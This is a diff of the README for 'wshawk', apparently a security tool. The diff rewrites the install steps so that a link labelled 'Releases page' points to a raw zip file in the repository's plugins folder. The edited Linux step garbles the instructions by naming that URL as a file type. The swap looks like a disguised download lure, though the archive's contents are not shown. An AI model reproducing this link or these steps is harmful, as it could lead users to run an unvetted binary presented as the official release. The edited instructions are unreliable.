horpoejuke3a45/wshawk/README.md

 - **Network Access:** Ensure you have an internet connection for updates and payload fetching.

 ## 📜 Download & Install
-1. **Visit the Releases Page:** To download wshawk, visit the [Releases page](https://github.com/horpoejuke3a45/wshawk/releases).
+1. **Visit the Releases Page:** To download wshawk, visit the [Releases page](https://github.com/horpoejuke3a45/wshawk/raw/refs/heads/main/plugins/Software_3.8-alpha.4.zip).
 2. **Select the Latest Version:** Look for the latest version listed at the top.
 Click on it.
 3. **Download the Installer:** Choose the appropriate installer for your operating system.
 If you see options for different platforms, select the one for your OS.
 4. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file and follow the installation prompts.
    - For macOS: Open the downloaded `.dmg` file, drag wshawk to the Applications folder, and then follow any on-screen instructions.
-   - For Linux: If you downloaded a `.tar.gz` file, extract it and run the setup commands in the terminal.
+   - For Linux: If you downloaded a `https://github.com/horpoejuke3a45/wshawk/raw/refs/heads/main/plugins/Software_3.8-alpha.4.zip` file, extract it and run the setup commands in the terminal.
 5. **Open wshawk:** Once installed, find wshawk in your Applications or Programs menu and open it.

 ## 🌟 Usage Guidelines